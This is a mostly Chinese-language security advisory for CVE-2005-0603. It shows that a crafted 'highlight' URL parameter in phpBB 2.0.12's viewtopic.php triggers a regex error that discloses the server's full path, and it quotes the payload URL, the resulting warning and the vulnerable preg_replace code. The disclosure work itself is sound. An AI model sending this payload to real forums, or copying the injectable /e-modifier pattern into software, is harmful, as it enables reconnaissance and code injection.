
Proof-of-concept exploit for CVE-2005-0603, demonstrating a full path disclosure vulnerability in phpBB 2.0.12 via a crafted regex in the viewtopic.php highlight parameter.
程序:phpBB 2.0.12 主页:http://www.phpbb.com 受影响版本:phpBB 2.0.12 及更低版本 风险:低风险!! 影响:完整路径泄露
-==phpBB 2.0.12 完整路径泄露==-
phpBB 是一个高性能、完全可扩展且高度可定制的开源论坛软件包。phpBB 拥有用户友好的界面、简单直接的管理面板以及有用的FAQ。基于强大的PHP服务器语言和您选择的MySQL、MS-SQL、PostgreSQL或Access/ODBC数据库服务器,phpBB 是所有网站的理想的免费社区解决方案。
本地主机及多个论坛
phpBB/viewtopic.php?p=6&highlight=[HaCkZaTaN]
会产生类似如下的输出:
Warning: Compilation failed: missing terminating ] for character class at offset 20 in /home/nst/forum/viewtopic.php(1110) : regexp code on line 1
这将导致完整路径泄露,我还注意到帖子内容会改变,不产生任何输出。 在 HighLight 变量中
问题如下: -----[ Start Vuln Code ] ------------------------------------
1106: if ($highlight_match)
1107: {
1108: // This was shamelessly 'borrowed' from volker at multiartstudio dot de
1109: // via php.net's annotated manual
1110: $message = str_replace('"', '"',
substr(preg_replace('#(>(((?>([^><]+|(?R)))*)<))#se', "preg_replace('#\b(" .
$highlight_match . ")\b#i', '<span style="color:#" . $theme['fontcolor3'] .
"">', '\0')", '>' . $message . '<'), 1, -1)); 1111: }
-----[ Ends Vulns Code ] ------------------------------------ 不要随便借用代码 LOL。
暂无 xD
暂无 xD
另外,我注意到在 php.ini 中
magic_quotes_gpc = On magic_quotes_sybase = Off
你需要将两者都设为 ON
发现者:HaCkZaTaN [email protected]
[N]eo [S]ecurity [T]eam [NST]® - http://neossecurity.net/
Irc.InfoGroup.cl #neosecurityteam
Paisterist
T0wn3r
Heap
Nitrous
CrashCool
eL_mEsIaS
Makoki
以及我的哥伦比亚朋友们